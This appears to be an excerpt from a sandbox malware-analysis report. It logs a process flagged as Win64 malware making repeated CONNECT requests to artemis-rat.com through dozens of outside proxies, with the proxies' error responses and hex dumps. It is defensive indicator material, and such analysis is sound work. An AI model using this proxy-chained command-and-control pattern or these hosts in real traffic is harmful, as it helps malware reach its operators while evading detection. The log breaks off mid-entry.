                                              Mar 11, 2024 08:37:23.365927935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.435467958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.616127014 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.22.0
                                              Date: Mon, 11 Mar 2024 07:37:35 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1133192.168.2.45341038.54.116.931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.162645102 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:24.581909895 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:26.714838028 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:29.430416107 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:34.550852060 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:37:44.790463924 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:38:06.038341045 CET39INHTTP/1.1 200 Connection established
                                              Mar 11, 2024 08:38:46.998529911 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1134192.168.2.453594142.11.215.3080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.163973093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.663280964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.366755009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.570292950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.975092888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.366656065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.757251978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.569528103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.256899118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:04.124771118 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1135192.168.2.45345362.72.29.174807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.169821978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.393923044 CET1047INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:33 GMT
                                              Server: Apache/2.4.52 (Ubuntu)
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PUT
                                              Access-Control-Max-Age: 1000
                                              Access-Control-Allow-Headers: x-requested-with, Content-Type, origin, authorization, accept, client-security-token
                                              Content-Length: 614
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1136192.168.2.45276283.229.61.4431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.176058054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257136106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.265125990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.366734982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.366317987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:58.366400003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:10.381967068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:34.397526026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:22.413141012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1137192.168.2.453742211.234.125.54437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.182955027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1138192.168.2.45358338.162.26.21131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.184058905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.597472906 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1139192.168.2.453744211.234.125.54437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.184287071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1140192.168.2.453745211.234.125.54437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.185533047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1141192.168.2.453747211.234.125.54437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.186527014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1142192.168.2.45359866.207.184.7354327284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.193420887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.415851116 CET308INHTTP/1.1 407 Proxy Authentication Required
                                              Server: FaaS v1.3-20220203-7fa38bd5af
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 65
                                              Proxy-Authenticate: Basic realm="Proxy"
                                              Connection: close
                                              Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                              Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1143192.168.2.453611198.12.255.193485727284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.196419001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.799366951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.497162104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.846502066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.467391968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.054130077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.705744028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.866842031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1144192.168.2.45155069.75.140.15780807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.201412916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.376266003 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1145192.168.2.452996132.148.167.231469837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.204705954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257132053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.366914034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.460268021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.460098982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:58.459932089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:10.522588968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1146192.168.2.453524218.252.244.126807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.237840891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1147192.168.2.453526147.75.34.85807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.238271952 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:22.544190884 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3
                                              Mar 11, 2024 08:37:22.615011930 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ee b4 b1 2a 3f 92 08 a3 84 99 fc b1 7d c2 53 a2 5a fd 36 ab 09 6b 80 01 f6 9c 43 f4 90 8d 0b 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                              Data Ascii: lhe*?}SZ6kC*,+0/$#('=<5/artemis-rat.com#%k(t(@]QmZt_Gqw{`z"#SQ


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1148192.168.2.45354046.17.63.166100007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.239500046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.532238007 CET339INHTTP/1.1 403 Forbidden
                                              Server: squid/4.7
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 5
                                              X-Squid-Error: TCP_RESET 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              X-Cache: MISS from proxy.wakoopa.com
                                              Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                              Connection: keep-alive
                                              Data Raw: 72 65 73 65 74
                                              Data Ascii: reset


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1149192.168.2.451370185.206.80.71807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:22.239974976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257193089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.366900921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.460278988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.460009098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
